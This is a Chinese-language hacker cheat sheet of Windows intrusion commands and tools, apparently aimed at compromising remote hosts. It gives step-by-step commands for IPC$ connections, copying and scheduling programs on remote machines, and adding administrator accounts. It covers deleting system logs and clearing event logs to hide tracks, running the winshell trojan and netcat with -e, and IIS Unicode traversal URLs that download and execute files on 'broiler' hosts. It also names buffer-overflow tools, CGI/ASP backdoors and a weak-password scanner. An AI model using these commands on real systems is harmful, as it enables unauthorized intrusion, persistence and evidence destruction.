网管和黑客都必须知道的命令
常用的几条NET命令:
(与远程主机建立空管连接)netuseIP地址ipc$""/use:""
(以管理员身份登录远程主机)netuseIP地址ipc$"密码"/use:"Administrator"
(传送文件到远程主机WINNT目录下)copy本机目录路径程序IP地址admin$
(查看远程主机时间)nettimeIP地址
(定时启动某个程序)atIP地址02:18readme.exe
(查看共享)netviewIP地址
(查看netbios工作组列表)nbtstat-AIP地址
(将远程主机C盘映射为自己的F盘)netusef:IP地址c$""/user:"Administrator"
(这两条把自己增加到管理员组):netuser用户名密码/add
netlocalgroupAdministrators用户名/add
(断开连接)netuseIP地址ipc$/delete
扫尾:
delC:winntsystem32logfiles*.*
delC:winntssytem32config*.evt
delC:winntsystem32dtclog*.*
delC:winntsystem32*.log
delC:winntsystem32*.txt
delC:winnt*.txt
delC:winnt*.log
一、netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
netsvc/listIP地址
netsvcscheduleIP地址/query
netsvcIP地址schedule/start
二、OpenTelnet.exe
远程启动主机的Telnet服务,并绑定端口到7878,例如:
OpenTelnetIP地址用户名密码17878
然后就可以telnet到主机的7878端口,进入DOS方式下:
telnetIP地址7878
三、winshell.exe
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面
的命令:
pPath(查看winshell主程序的路径信息)
breBoot(重新启动机器)
dshutDown(关闭机器)
sShell(执行后你就会看到可爱的“C:>”)
xeXit(退出本次登录会话,此命令并不终止winshell的运行)
CMD>http://.../srv.exe(通过http下载其他网站上的文件到运行winshell的机器上)
四、3389登陆器,GUI方式登录远程主机的
五、elsave.exe
事件日志清除工具
elsave-sIP地址-l"application"-C
elsave-sIP地址-l"system"-C
elsave-sIP地址-l"security"-C
执行后成功清除应用程序日志,系统日志,安全日志
六、hbulot.exe
开启win2kserver和winxp的3389服务
hbulot[/r]
使用/r表示安装完成后自动重起目标使设置生效。
七、nc.exe(netcat.exe)
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
想要连接到某处:nc[-options]hostnameport[s][ports]...
绑定端口等待连接:nc-l-pport[-options][hostname][port]
参数:
-eprog程序重定向,一旦连接,就执行[危险!!]
-ggatewaysource-routinghoppoint[s],upto8
-Gnumsource-routingpointer:4,8,12,...
-h帮助信息
-isecs延时的间隔
-l监听模式,用于入站连接
-n指定数字的IP地址,不能用hostname
-ofile记录16进制的传输
-pport本地端口号
-r任意指定本地及远程端口
-saddr本地源地址
-uUDP模式
-v详细输出——用两个-v可得到更详细的内容
-wsecstimeout的时间
-z将输入输出关掉——用于扫描时
八、TFTPD32.EXE
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用
Unicode漏洞或telnet到肉鸡,例如:
http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/ctftp-i本机IP地址get文件
名c:winntsystem32文件名
然后可以直接令文件运行:
http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个
端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。
xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP
执行权限的目录。然后用IE浏览器连接。
一、一Xscan命令行运行参数说明:
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,
按"<ctrl+c>"强行关闭程序。
1.命令格式:xscan-host<起始IP>[-<终止IP>]<检测项目>[其他选项]
xscan-file<主机列表文件名><检测项目>[其他选项]
其中<检测项目>含义如下:
-port:检测常用服务的端口状态(可通过datconfig.ini文件的"PORT-SCAN-OPTIONSPORT-LIST"项定
制待检测端口列表);
-ftp:检测FTP弱口令(可通过datconfig.ini文件设置用户名/密码字典文件);
-ntpass:检测NT-Server弱口令(可通过datconfig.ini文件设置用户名/密码字典文件);
-cgi:检测CGI漏洞(可通过datconfig.ini文件的"CGI-ENCODEencode_type"项设置编码方案);
-iis:检测IIS漏洞(可通过datconfig.ini文件的"CGI-ENCODEencode_type"项设置编码方案);
[其他选项]含义如下:
-v:显示详细扫描进度
-p:跳过Ping不通的主机
-o:跳过没有检测到开放端口的主机
-t<并发线程数量[,并发主机数量]>:指定最大并发线程数量和并发主机数量,默认数量为100,10